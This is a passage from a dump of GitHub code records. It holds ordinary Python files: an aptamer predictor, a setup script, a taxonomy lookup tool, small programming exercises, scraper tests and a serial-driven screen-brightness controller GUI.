\"CTGTCTCTTATACACATCTCCGAGCCCACGAGAC\"\r\n self.null_model_aptamer_sequence = self.p5 + self.p7\r\n self.null_pseudopair_bond_strength = 0\r\n self.null_pseudopair_bond_probability = 0\r\n\r\n self.target_peptide = \"MSKGEELFTG VVPILVELDG DVNGHKFSVS GEGEGDATYG KLTLKFICTT GKLPVPWPTL VTTFSYGVQC FSRYPDHMKQ HDFFKSAMPE GYVQERTIFF KDDGNYKTRA EVKFEGDTLV NRIELKGIDF KEDGNILGHK LEYNYNSHNV YIMADKQKNG IKVNFKIRHN IEDGSVQLAD HYQQNTPIGD GPVLLPDNHY LSTQSALSKD PNEKRDHMVL LEFVTAAGIT HGMDELYK\"\r\n self.peptide_fragment_list = []\r\n\r\n self.peptide_fragment_and_corresponding_aptamer_tup_list = []\r\n self.desired_aptamer_length = 50\r\n\r\n self.threshold_value = 0\r\n\r\n # set to false to alter sort contingent variable\r\n self.sort_by_bond_strength = True\r\n\r\n self.programatc_iterations = 10\r\n\r\n def peptide_parser(self, desired_length):\r\n \"\"\" This function is designed to parse the given peptide into all possible sequences of the desired length.\r\n These fragments will be considered as possible locations for aptamer interaction.\r\n\r\n\r\n Input: peptide sequence\r\n Output: list of possible interaction locations\r\n \"\"\"\r\n\r\n target_peptide_stripped = self.target_peptide.replace(\" \", '')\r\n\r\n peptide_fragment_list = []\r\n for index in range(0, len(target_peptide_stripped) - desired_length):\r\n peptide_fragment_list.append(target_peptide_stripped[index:index + desired_length])\r\n\r\n return peptide_fragment_list\r\n\r\n def null_model_aptamer_value_calculator(self):\r\n \"\"\"The null model in the context of this algorithm is the result of prediction using the\r\n PCR primers alone, represented by the P5 and P7 primers. As such the null model is deterministic.\r\n\r\n Values are formed by summing the number of bonds and probabilities associated with both hydrogen bonding\r\n and pseudopairing. This develops a total bonding score.\r\n\r\n The maximum of the values developed by evaluation of all fragments is the null value. The sequence which\r\n develops the maximum total bonding score is identified and saved.\r\n\r\n Input: The primer sequence.\r\n Output: A value representing the score of the primers alone.\r\n \"\"\"\r\n\r\n null_model_peptide_fragment_list = self.peptide_parser(len(self.p5) + len(self.p7))\r\n null_model_aptamer = self.p5 + self.p7\r\n\r\n null_model_sum_list = []\r\n for peptide_fragment in null_model_peptide_fragment_list:\r\n null_model_score_list = []\r\n for i in range(len(peptide_fragment)):\r\n if peptide_fragment[i] in self.association_probability_nucleotide_to_amino_dict_dict[null_model_aptamer[i]].keys():\r\n # condense values\r\n null_model_pseudopair_data = \\\r\n self.association_probability_nucleotide_to_amino_dict_dict[null_model_aptamer[i]][peptide_fragment[i]][0]\r\n null_model_hydrogen_bond_data = \\\r\n self.association_probability_nucleotide_to_amino_dict_dict[null_model_aptamer[i]][peptide_fragment[i]][1]\r\n\r\n bond_sum_data = (null_model_pseudopair_data[0] + null_model_hydrogen_bond_data[0],\r\n null_model_pseudopair_data[1] + null_model_hydrogen_bond_data[1])\r\n\r\n null_model_score_list.append(bond_sum_data)\r\n\r\n null_model_sum_tuple = sum(i[0] for i in null_model_score_list), sum(i[1] for i in null_model_score_list)\r\n null_model_sum_list.append((self.p5 + self.p7, null_model_sum_tuple, peptide_fragment))\r\n\r\n # deterministic null model value used as threhold to determine viability of aptamer candidates by sum bond probability\r\n self.threshold_value = sum(j[1][1] for j in null_model_sum_list) / len(null_model_sum_list)\r\n\r\n def theoretical_aptamer_predictor(self):\r\n \"\"\"\r\n In developing an aptamer from the peptide sequence, the aptamer sequnce is treated as a hidden path.\r\n The peptide sequence is treated as the empirical path.\r\n\r\n As the peptide path is all that is known, the peptide to amino dictionary dictionary will be used.\r\n\r\n Nucleotides will be chosen by use of the probability values as weights for the random choice library function.\r\n\r\n As is similar to the means of developing the null model data, a total bonding score will be developed for each possible interaction.\r\n\r\n Input: peptide sequence.\r\n Output: aptamer sequences paired with total bonding scores.\r\n\r\n \"\"\"\r\n\r\n peptide_fragment_list = self.peptide_parser(self.desired_aptamer_length)\r\n\r\n for peptide_fragment in peptide_fragment_list:\r\n theoretical_aptamer = ''\r\n bond_prob_sum = 0\r\n total_prob_bonds = 0\r\n\r\n for i in range(0, len(peptide_fragment)):\r\n nucleotide_associated_probs_sum_list = []\r\n possible_base_list = []\r\n sum_tup_list = []\r\n\r\n if peptide_fragment[i] in self.association_probability_amino_to_nucleotide_dict_dict.keys():\r\n for possible_nucleotide in self.association_probability_amino_to_nucleotide_dict_dict[peptide_fragment[i]]:\r\n # extract sum probabilities into tuple\r\n prob_bond_tup_list = self.association_probability_amino_to_nucleotide_dict_dict[peptide_fragment[i]][possible_nucleotide]\r\n\r\n probability_sum_tup = possible_nucleotide, sum(j[0] for j in prob_bond_tup_list), sum(j[1] for j in prob_bond_tup_list)\r\n\r\n sum_tup_list.append(probability_sum_tup)\r\n\r\n possible_base_list.append(probability_sum_tup[0])\r\n\r\n nucleotide_associated_probs_sum_list.append(probability_sum_tup)\r\n\r\n base_probability_weight_tup = tuple([i[1] for i in nucleotide_associated_probs_sum_list])\r\n\r\n # use probability sums as weights to select positionally corresponding bases\r\n selected_base = random.choices(possible_base_list, weights=base_probability_weight_tup, k=1)[0]\r\n for sum_tup in sum_tup_list:\r\n if sum_tup[0] == selected_base:\r\n bond_prob_sum += sum_tup[1]\r\n total_prob_bonds += sum_tup[2]\r\n\r\n theoretical_aptamer += selected_base\r\n\r\n else:\r\n\r\n theoretical_aptamer += '-'\r\n\r\n theoretical_aptamer_tup = (theoretical_aptamer, peptide_fragment, bond_prob_sum, total_prob_bonds)\r\n\r\n self.threshhold_checker(theoretical_aptamer_tup)\r\n\r\n def threshhold_checker(self, theoretical_aptamer_tup):\r\n\r\n if theoretical_aptamer_tup[2] > self.threshold_value:\r\n self.peptide_fragment_and_corresponding_aptamer_tup_list.append((theoretical_aptamer_tup[0], theoretical_aptamer_tup[1],\r\n theoretical_aptamer_tup[2], round(theoretical_aptamer_tup[3], 3)))\r\n\r\n def print_out_results(self):\r\n self.peptide_fragment_and_corresponding_aptamer_tup_list.sort(key=lambda x: x[2], reverse=True)\r\n for tup in self.peptide_fragment_and_corresponding_aptamer_tup_list:\r\n print(tup)\r\n\r\n def driver(self):\r\n \"\"\"The purpose of this function is to drive iterations of the program.\r\n \"\"\"\r\n print(\"programatic iterations: \", self.programatc_iterations)\r\n print(\" \")\r\n\r\n # launch input collection/results GUI\r\n\r\n # find bonding strength and probability scores for primer sequences p5 and p7\r\n self.null_model_aptamer_value_calculator()\r\n\r\n for i in range(0, self.programatc_iterations):\r\n self.theoretical_aptamer_predictor()\r\n\r\n self.print_out_results()\r\n\r\n def peptide_text_box_collect(self):\r\n\r\n # Insert\r\n self.target_peptide = self.peptide_collection_text_box.get()\r\n print(self.target_peptide)\r\n\r\n def GUI(self):\r\n\r\n root_window = tk.Tk()\r\n root_window.geometry(\"1000x750\")\r\n\r\n root_window.wm_title(\"Aptamer Predictor by Quin Lamothe for Bernick Lab UCSC, 2022\")\r\n\r\n iterant_entry = tk.Entry()\r\n\r\n\r\n peptide_entry_label = tk.Label(text=\"Target Peptide Entry:\")\r\n self.peptide_collection_text_box = tk.Entry()\r\n peptide_entry_label.pack()\r\n self.peptide_collection_text_box.pack()\r\n\r\n peptide_collection_button = tk.Button(root_window, text=\"Enter\", command=self.peptide_text_box_collect)\r\n peptide_collection_button.pack()\r\n\r\n driver_button = tk.Button(root_window, text=\"Process\", command=self.driver)\r\n driver_button.pack()\r\n root_window.mainloop()\r\n\r\n\r\ndef main():\r\n\r\n class_access = interaction_approximator()\r\n\r\n class_access.GUI()\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"Alepidoptera7/ssDNA-Aptamer-Prediction-","sub_path":"Aptamer_Predictor.py","file_name":"Aptamer_Predictor.py","file_ext":"py","file_size_in_byte":12405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"12256994723","text":"from setuptools import setup, find_packages\nimport os, shutil\n\nCUR_PATH = os.path.dirname(os.path.abspath(__file__))\npath = os.path.join(CUR_PATH, 'build')\nif os.path.isdir(path):\n print('INFO del dir ', path) \n shutil.rmtree(path)\n\n# setuptools.setup(\n# name=\"myfunc\",\n# version=\"0.1.3\",\n# author=\"Minghao GUO\",\n# author_email=\"zjugmh@zju.edu.cn\",\n# description=\"some functions I use frequently\",\n# py_modules=['myfunc'],\n# )\n\nsetup(\n name=\"myfunc\",\n version=\"0.1.4\",\n author=\"Minghao GUO\",\n author_email=\"ihenrykwok@outlook.com\",\n description=\"some functions I use frequently\",\n packages=['myfunc'],\n install_requires=[],\n)","repo_name":"minghaoguo20/myfunc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23571866401","text":"import math\n\nt = int(input())\nfor t in range(t):\n\tn,k = tuple(map(int, input().split(' ')))\n\tstalls = [[0, math.floor((n+1) / 2), n+1]]\n\t#occupied = [False] * (n+2)\n\t#occupied[0] = occupied[n+1] = True\n\t#occupied[buckets[0][1]] = True\n\n\tfor i in range(k-1):\n\t\tcandidates = []\n\t\tfor l,m,r in stalls:\n\t\t\tcandidates.append([l, math.floor((l+m) / 2), m])\n\t\t\tcandidates.append([m, math.floor((r+m) / 2), r])\n\n\t\t_l = None\n\t\t_r = None\n\t\tcurr_best = None\n\t\tfor l,m,r in candidates:\n\t\t\tif (curr_best == None) \\\n\t\t\t\tor min(m-l-1, r-m-1) > _l:\n\t\t\t\t_l = min(m-l-1, r-m-1)\n\t\t\t\t_r = max(m-l-1, r-m-1)\n\t\t\t\tcurr_best = [l,m,r]\n\t\t\telif min(m-l-1, r-m-1) == _l and max(m-l-1, r-m-1) > _r:\n\t\t\t\t_r = max(m-l-1, r-m-1)\n\t\t\t\tcurr_best = [l,m,r]\n\n\t\tfor s in stalls:\n\t\t\tif curr_best[1] < s[1] and s[0] < curr_best[1]: s[0] = curr_best[1]\n\t\t\tif curr_best[1] > s[1] and s[2] > curr_best[1]: s[2] = curr_best[1]\n\n\t\tstalls.append(curr_best)\n\n\tl,m,r = stalls[-1]\n\t_l = max(m-l-1, r-m-1)\n\t_r = min(m-l-1, r-m-1)\n\n\tprint('Case #%d: %d %d' % (t+1, _l, _r))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2951.py","file_name":"2951.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8593472901","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport argparse\nimport logging\n\nfrom ncbitools import __author__, __email__, __version__\n\n__all__ = []\n\nLOG = logging.getLogger(__name__)\n\n\nclass Tax(object):\n\n __slots__ = [\"id\", \"name\", \"parent\", \"rank\"]\n\n def __init__(self):\n self.id = None\n self.name = None\n self.parent = None\n self.rank = {}\n\n\ndef read_tbl(file, sep=\"\\t\"):\n\n for line in open(file):\n line = line.strip()\n\n if line.startswith(\"#\"):\n continue\n\n if line:\n yield line.split(sep)\n\n\ndef read_names_dmp(file, name_class_filter=\"scientific name\"):\n \"\"\"\n read names.dmp and return a dict of tax_id and it's scientific name\n\n names.dmp contains:\n tax_id\t\t\t\t\t-- the id of node associated with this name\n name_txt\t\t\t\t-- name itself\n unique name\t\t\t\t-- the unique variant of this name if name not unique\n name class\t\t\t\t-- (synonym, common name, ...)\n\n :param file:\n :param name_class_filter:\n :return:\n \"\"\"\n\n r = {}\n LOG.info(\"Parsing tax names from %r\" % file)\n\n for line in read_tbl(file):\n tax_id, _, name_txt, _, unique_name, _, name_class, _ = line\n\n if name_class != name_class_filter:\n continue\n\n r[tax_id] = name_txt\n\n return r\n\n\ndef read_nodes_dmp(file):\n \"\"\"\n tax_id\t\t\t\t\t-- node id in GenBank taxonomy database\n parent tax_id\t\t\t\t-- parent node id in GenBank taxonomy database\n rank\t\t\t\t\t-- rank of this node (superkingdom, kingdom, ...)\n embl code\t\t\t\t-- locus-name prefix; not unique\n division id\t\t\t\t-- see division.dmp file\n inherited div flag (1 or 0)\t\t-- 1 if node inherits division from parent\n genetic code id\t\t\t\t-- see gencode.dmp file\n inherited GC flag (1 or 0)\t\t-- 1 if node inherits genetic code from parent\n mitochondrial genetic code id\t\t-- see gencode.dmp file\n inherited MGC flag (1 or 0)\t\t-- 1 if node inherits mitochondrial gencode from parent\n GenBank hidden flag (1 or 0) -- 1 if name is suppressed in GenBank entry lineage\n hidden subtree root flag (1 or 0) -- 1 if this subtree has no sequence data yet\n comments\t\t\t\t-- free-text comments and citations\n\n :param file:\n :return:\n \"\"\"\n\n r = {}\n LOG.info(\"Parsing tax nodes from %r\" % file)\n\n for line in read_tbl(file):\n tax_id = line[0]\n parent = line[2]\n rank = line[4]\n\n r[tax_id] = [parent, rank]\n\n return r\n\n\ndef merge_dmp(names_dmp, nodes_dmp):\n \"\"\"\n\n :param names_dmp:\n :param nodes_dmp:\n :return: a dict contains {tax_id: [name_txt, parent, rank]}\n \"\"\"\n\n r = {}\n\n names = read_names_dmp(names_dmp)\n nodes = read_nodes_dmp(nodes_dmp)\n\n for n in nodes:\n r[n] = [names[n]] + nodes[n]\n\n return r\n\n\ndef get_rank(database, tax_id, tax):\n\n if tax_id not in database:\n return 0\n\n name, parent, rank = database[tax_id]\n\n if parent == tax_id:\n return tax\n\n tax.rank[rank] = name\n\n get_rank(database, parent, tax)\n\n\ndef get_taxons(names_dmp, nodes_dmp, tax_ids, ranks):\n\n database = merge_dmp(names_dmp, nodes_dmp)\n print(\"\\t\".join([\"tax_id\"] + ranks))\n\n for i in read_tbl(tax_ids):\n LOG.info(\"Parsing tax of %s\" % i[0])\n tax = Tax()\n tax.id = i[0]\n get_rank(database, i[0], tax)\n\n r = [i[0]]\n\n for j in ranks:\n\n if j in tax.rank:\n r.append(tax.rank[j])\n else:\n r.append(\"\")\n\n print(\"\\t\".join(r))\n\n\ndef set_args():\n\n args = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\ndescription:\n\nversion: %s\nauthor: %s\nemail: %s\n \"\"\" % (__version__, \" \".join(__author__), __email__))\n\n args.add_argument(\"file\", help=\"file contains tax id per line\")\n args.add_argument(\"--names\", default=\"names.dmp\", help=\"path of names.dmp download from NCBI\")\n args.add_argument(\"--nodes\", default=\"nodes.dmp\", help=\"path of nodes.dmp download from NCBI\")\n args.add_argument(\"--ranks\", default=\"superkingdom,kingdom,phylum,class,order,family,genus,species\",\n help=\"ranks to show in the result, \"\n \"default: 'superkingdom,kingdom,phylum,class,order,family,genus,species' \")\n\n return args.parse_args()\n\n\ndef main():\n args = set_args()\n\n logging.basicConfig(\n stream=sys.stderr,\n level=logging.INFO,\n format=\"[%(levelname)s] %(message)s\"\n )\n\n get_taxons(args.names, args.nodes, args.file, args.ranks.split(\",\"))\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"FlyPythons/NCBITools","sub_path":"ncbitools/get_taxon.py","file_name":"get_taxon.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11861266069","text":"import sys\n# 재귀 허용 깊이를 수동으로 늘려주는 코드\nsys.setrecursionlimit(10**6) \n# 정점의 수, 간선의 수\nn, m = map(int, input().split())\n# 연결노드 그래프 초기화(노드와 인덱스를 같게 하기 위해서 n+1로)\ngraph = [[] for _ in range(n+1)]\n# 방문 순서 그래프 (이것도 노드와 인덱스를 같게 하기 위해)\nvisited = [False] * (n+1)\n\ndef dfs(graph, v, visited):\n visited[v] = True\n print(v, end=' ')\n for i in graph[v]:\n if not visited[i]:\n dfs(graph, i, visited)\n\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n\nfor i in range(n+1):\n graph[i].sort()\n\ndfs(graph, 1, visited)\n\n\"\"\"\n깊이 우선 탐색이란 그래프를 탐색(또는 순회)하는 방법 중 하나입니다. \n\n\n\n깊이 우선 탐색은 다음과 같은 방식으로 이루어집니다. \n\n\n\n1. 정점을 하나 정하여 방문하였다고 표시합니다. \n\n2. 이 정점과 간선으로 연결된 다른 정점에 대하여, \n\n2-1. 이미 방문했던 정점이라면 무시합니다. \n\n2-2. 아직 방문하지 않은 정점이라면 그 정점부터 다시 1을 적용합니다. \n\n\n\n이를 의사코드로 작성하면 다음과 같게 됩니다. \n\n\n\nfunction DFS(V, E, C) { // V : 정점의 집합, E : 간선의 집합, C : 현재 방문할 정점\n\n visited[C] = true // 현재 정점을 방문하였다고 표시\n\n for each x in E(C) { // E(C) : C와 인접한 정점\n\n if (!visited[x]) DFS(V, E, x) // 아직 방문하지 않은 정점이면 해당 정점부터 깊이 우선 탐색\n\n }\n\n}\n\n\n\n방향성과 가중치가 없는 그래프가 주어졌을 때 정점 1에서부터 깊이 우선 탐색을 수행하는 프로그램을 작성해주세요. \n\n\n\n탐색은 인접한 정점 중에서 정점번호가 작은 정점부터 수행합니다. \n\n정점의 개수가 N개일 때 각 정점의 번호는 1부터 N까지입니다.\n\n\n예제 입력1\n\n3 0\n\n예제 출력1\n\n1\n\n예제 입력2\n\n5 3\n1 4\n2 3\n4 5\n\n예제 출력2\n\n1 4 5\n\n입력값 설명\n\n첫째 줄에 정점의 개수 N과 간선의 개수 M이 입력됩니다. (1≤N, 0≤M≤1,000)\n둘째 줄부터 M + 1번째 줄까지 정수 A와 B가 입력됩니다. (1 ≤ A, B ≤ 1,000) 이 때 각 줄은 A와 B가 서로 연결되었음을 의미합니다.\n\n출력값 설명\n\n정점 1에서 깊이 우선 탐색을 수행한 결과를 공백으로 구분하여 출력합니다.\n\"\"\"","repo_name":"namoo1818/CodingMastars","sub_path":"4320 깊이 우선 탐색.py","file_name":"4320 깊이 우선 탐색.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13227043568","text":"import numpy as np\r\nfrom Source import Chessboard\r\nWeight = {True:np.array((1.0,1.05,1.1,1.15,1.2,1.2,1.2,1.2)),False:np.array((1.2,1.2,1.2,1.2,1.15,1.1,1.05,1.0))}\r\n\r\n\r\ndef getmark(board:Chessboard, isFirst:bool):\r\n \"评估函数\"\r\n Value, Belong = np.array(board.getRaw(),).transpose((2,0,1))\r\n Belong ^= isFirst\r\n Ours = Belong< 90:\n print(f\"Your score is **{total_count}**, you go together like coke and mentos.\")\nelif int(total_count) > 39 and int(total_count) < 51:\n print(f\"Your score is **{total_count}**, you are alright together.\")\nelse:\n print(f\"Your score is **{true_count}{love_count}**.\")\n","repo_name":"dielenko/python-code-contents","sub_path":"100-days-of-code-python-exercise/love-calculator-program/love_calculator_program.py","file_name":"love_calculator_program.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16767659290","text":"# 문제출처: https://www.acmicpc.net/problem/10828\n\ndef enter_count():\n try:\n count = int(input())\n except ValueError:\n return enter_count()\n\n if count >= 1 and count <=10000:\n return count\n else:\n return enter_count()\n\ndef enter_command():\n try:\n command = input()\n return command\n except ValueError:\n return enter_command()\n\ndef push(stack, input_command):\n command, num = input_command.split()\n if command == 'push':\n return num\n else:\n return -1\n\ndef pop(stack):\n if len(stack) == 0:\n print(-1)\n else:\n print(stack.pop())\n\ndef size(stack):\n print(len(stack))\n\ndef empty(stack):\n if len(stack) == 0:\n print(1)\n else:\n print(0)\n\ndef top(stack):\n if len(stack) == 0:\n print(-1)\n else:\n print(stack[-1])\n \nif __name__ == \"__main__\":\n s = []\n cnt = enter_count()\n\n while cnt != 0:\n cmd = enter_command()\n\n if cmd == 'pop':\n pop(s)\n elif cmd == 'size':\n size(s)\n elif cmd == 'empty':\n empty(s)\n elif cmd == 'top':\n top(s)\n else:\n num = push(s, cmd)\n if num == -1:\n continue\n else:\n s.append(num)\n\n cnt -= 1","repo_name":"yooooujin/algorithm-study","sub_path":"archive/10828/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26970678718","text":"from unittest.mock import Mock\nfrom tagesschauscraper.retrieve import WebsiteTest\nfrom requests import Response\nimport pytest\n\n\n@pytest.fixture\ndef response_mock() -> Response:\n responseMock = Mock(spec=Response)\n responseMock.status_code = 200\n with open(\"tests/data/teaser-snippet.html\", \"r\") as f:\n responseMock.text = f.read()\n return responseMock\n\n\ndef test_is_element(response_mock: Response) -> None:\n websiteTest = WebsiteTest(response_mock)\n assert websiteTest.is_element(\n attrs={\"class\": \"teaser-xs__headline-wrapper\"}\n )\n\n\ndef test_is_text_in_element(response_mock: Response) -> None:\n websiteTest = WebsiteTest(response_mock)\n text = \"Nordstream-Betreiber offenbar insolvent\"\n attrs = {\"class\": \"teaser-xs__headline-wrapper\"}\n assert websiteTest.is_text_in_element(target_text=text, attrs=attrs)\n","repo_name":"TheFerry10/TagesschauScraper","sub_path":"tests/unit/test_retrieve.py","file_name":"test_retrieve.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20245528075","text":"\r\nimport serial\r\nimport screen_brightness_control as sbc\r\nimport math\r\nfrom threading import Thread\r\nfrom tkinter import Tk, Button, Label, Frame, ttk, DoubleVar, messagebox\r\nimport csv\r\n\r\nclass GUI(Frame):\r\n def create_widgets(self):\r\n self.Label1 = Label(self,text = \"Brightness : \")\r\n self.Label1.grid(row = 0, column = 0, sticky = \"w\")\r\n self.Label2 = Label(self,text = \"Distance :\")\r\n self.Label2.grid(row = 1, column = 0, sticky = \"w\")\r\n self.Label3 = Label(self,text = \"Ambient Brightness :\")\r\n self.Label3.grid(row = 2, column = 0, sticky = \"w\")\r\n self.Label4 = Label(self,text = \"Set Value :\")\r\n self.Label4.grid(row = 3, column = 0, sticky = \"w\")\r\n self.Label5 = Label(self,text = \"Brightness Difference : \")\r\n self.Label5.grid(row = 4, column = 0, sticky=\"w\")\r\n self.Label6 = Label(self,text = \"Time Lapsed : \")\r\n self.Label6.grid(row = 5, column = 0, sticky=\"w\")\r\n self.board = None\r\n self.current_value = DoubleVar()\r\n self.current_value.set(50.0)\r\n self.slider_label = ttk.Label(\r\n self,\r\n text='Slider:'\r\n )\r\n\r\n self.slider_label.grid(\r\n column=0,\r\n row=7,\r\n sticky='w'\r\n )\r\n\r\n # slider\r\n self.slider = ttk.Scale(\r\n self,\r\n from_=0,\r\n to=100,\r\n orient='horizontal', # vertical\r\n command=self.slider_changed,\r\n variable=self.current_value,\r\n value = 50.0\r\n )\r\n\r\n self.slider.grid(\r\n column=1,\r\n row=7,\r\n sticky='we'\r\n )\r\n\r\n # current value label\r\n self.current_value_label = ttk.Label(\r\n self,\r\n text='Current Brightness:'\r\n )\r\n\r\n self.current_value_label.grid(\r\n row=8,\r\n columnspan=2,\r\n sticky='n',\r\n ipadx=10,\r\n ipady=10\r\n )\r\n\r\n # value label\r\n self.value_label = ttk.Label(\r\n self,\r\n text=self.get_current_value()\r\n )\r\n self.value_label.grid(\r\n row=9,\r\n columnspan=2,\r\n sticky='n'\r\n )\r\n self.count = -1\r\n self.time = 0\r\n self.run = False\r\n self.set_val = 0.0\r\n self.saved_data = []\r\n self.control_flag = True\r\n self.save_flag = True\r\n self.start = Button(self, text='Start',width=25, command=lambda: Thread(target=self.Start).start())\r\n self.stop = Button(self, text='Stop', width=25, state='disabled', command=self.Stop)\r\n self.reset = Button(self, text='Reset&Save',width=25, state='disabled', command = self.Reset)\r\n self.control = Button(self, text=\"Brighness Ctrl : ON\", width=25, state='normal', command=self.enable_control)\r\n self.save = Button(self, text=\"Save Data: ON\", width=25, state='normal', command=self.enable_save)\r\n self.start.grid(row = 6, column = 0)\r\n self.stop.grid(row = 6, column = 1)\r\n self.reset.grid(row = 6, column = 2)\r\n self.control.grid(row=6,column=3)\r\n self.save.grid(row=6,column=4)\r\n \r\n def enable_control(self):\r\n if self.control_flag :\r\n self.control['text'] = \"Brighness Ctrl : OFF\"\r\n self.control_flag = False\r\n else :\r\n self.control['text'] = \"Brighness Ctrl : ON\"\r\n self.control_flag = True\r\n\r\n def enable_save(self):\r\n if self.save_flag :\r\n self.save['text'] = \"Save Data: OFF\"\r\n self.save_flag = False\r\n else :\r\n self.save['text'] = \"Save Data: ON\"\r\n self.save_flag = True\r\n\r\n def get_current_value(self):\r\n return self.current_value.get()\r\n\r\n\r\n def slider_changed(self,event):\r\n self.value_label.configure(text='{: .2f}'.format(self.get_current_value()))\r\n brightness = int(self.get_current_value())\r\n sbc.set_brightness(brightness)\r\n \r\n def time_convert(self):\r\n mins = self.time // 60\r\n sec = self.time % 60\r\n hours = mins // 60\r\n mins = mins % 60\r\n text = \"Time Lapsed = {0}:{1}:{2}\".format(int(hours),int(mins),sec)\r\n return text\r\n\r\n def brightness_control(self,LDR_r,Length,diff) :\r\n if Length > 40 :\r\n Length = 40\r\n coef= 7.14407 - 0.2038*Length \r\n grad = 0.00043*pow(Length,2) - 0.0623*Length + 2.52317\r\n brightness_diff = (diff-coef)/grad\r\n if brightness_diff < 0 :\r\n brightness_diff = 0\r\n if LDR_r 100 :\r\n brightness = 100\r\n self.value_label['text'] = brightness\r\n sbc.set_brightness(brightness)\r\n elif LDR_r > self.set_val+2 and LDR_r!=0 :\r\n cur_brightness = sbc.get_brightness()\r\n brightness = int(cur_brightness-brightness_diff)\r\n if brightness < 0 :\r\n brightness = 0\r\n self.value_label['text'] = brightness\r\n sbc.set_brightness(brightness)\r\n\r\n def var_name(self):\r\n while self.run:\r\n try :\r\n ser = str(self.board.readline())\r\n data = ser.split(\",\")\r\n LDR_r = float(data[1])\r\n Length = float(data[2])\r\n Ambient_r = float(data[3])\r\n diff = math.fabs(LDR_r - self.set_val)\r\n if self.count <= 3:\r\n show1 = \"Starting\"\r\n show2 = \"Starting\"\r\n show3 = \"Starting\"\r\n show4 = \"Starting\"\r\n show5 = \"Starting\"\r\n show6 = \"Starting\"\r\n self.set_val += LDR_r\r\n self.Label5['text'] = show5\r\n if self.count == 3:\r\n self.set_val = self.set_val/5\r\n self.Label5['text'] = \"Set Value : %f lux\" % self.set_val\r\n else:\r\n show1 = \"Brightness : %f lux\" % LDR_r\r\n show2 = \"Distance : %f cm\" % Length\r\n show3 = \"Ambient Brightness : %f lux\" % Ambient_r\r\n show4 = \"Brightness Difference : %f \" % diff\r\n show6 = self.time_convert()\r\n self.time += 1\r\n self.Label1['text'] = show1\r\n self.Label2['text'] = show2\r\n self.Label3['text'] = show3\r\n self.Label4['text'] = show4\r\n self.Label6['text'] = show6\r\n #Increment the count after\r\n #every 1 second\r\n if self.count>3 and self.control_flag and self.save_flag:\r\n self.brightness_control(LDR_r,Length,diff)\r\n data = [self.time,LDR_r,Length,Ambient_r,self.set_val]\r\n self.saved_data.append(data)\r\n elif self.count>3 and self.control_flag and not(self.save_flag):\r\n self.brightness_control(LDR_r,Length,diff)\r\n elif not(self.control_flag) and self.save_flag :\r\n data = [self.time,LDR_r,Length,Ambient_r,self.set_val]\r\n self.saved_data.append(data)\r\n self.count += 1\r\n except :\r\n self.run=False\r\n\r\n\r\n\r\n # While stopped\r\n def Stop(self):\r\n self.slider['state']='normal'\r\n self.start['state'] = 'normal'\r\n self.stop['state'] = 'disabled'\r\n self.reset['state'] = 'normal'\r\n self.control['state'] = 'normal'\r\n self.save['state'] = 'normal'\r\n self.run = False\r\n self.count = -1\r\n if self.board != None :\r\n self.board.close()\r\n\r\n def Write_data(self):\r\n header = [\"Time (s)\",\"Brightness (lx)\",\"Distance (cm)\",\"Ambient Brightness (lx)\",\"Set Value(lx)\"]\r\n if self.control_flag :\r\n filename = \"Controlled_Data.csv\"\r\n else :\r\n filename = \"Uncontrolled_Data.csv\"\r\n with open (filename, 'w', encoding='UTF8', newline='') as f:\r\n writer = csv.writer(f)\r\n writer.writerow(header)\r\n writer.writerows(self.saved_data)\r\n\r\n # For Reset\r\n def Reset(self):\r\n self.count = -1\r\n self.set_val = 0\r\n self.reset['state'] = 'disabled'\r\n self.Label1['text'] = \"Brightness : \"\r\n self.Label2['text'] = \"Distance : \"\r\n self.Label3['text'] = \"Ambient Brightness : \"\r\n self.Label4['text'] = \"Brightness Difference : \"\r\n self.Label5['text'] = \"Set Value : \"\r\n self.Label6['text'] = \"Time Lapsed : \"\r\n if self.save_flag :\r\n self.Write_data()\r\n self.saved_data.clear()\r\n\r\n\r\n\r\n\r\n # While Running\r\n def Start(self):\r\n try :\r\n self.board = serial.Serial('COM5', 9600, timeout = 1)\r\n self.run = True\r\n self.start['state'] = 'disabled'\r\n self.stop['state'] = 'normal'\r\n self.reset['state'] = 'disabled'\r\n self.slider['state'] = 'disabled'\r\n self.control['state'] = 'disabled'\r\n self.save['state'] = 'disabled'\r\n self.var_name()\r\n except :\r\n messagebox.showerror(\"Error\", \"Device Tidak Terdeteksi !!\")\r\n self.start['state'] = 'normal'\r\n self.stop['state'] = 'disabled'\r\n self.reset['state'] = 'disabled'\r\n self.slider['state'] = 'normal'\r\n pass\r\n \r\n def __init__(self, master = None):\r\n Frame.__init__(self, master)\r\n self.create_widgets()\r\n self.grid()\r\n\r\nroot = Tk()\r\napp = GUI(master = root)\r\napp.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n 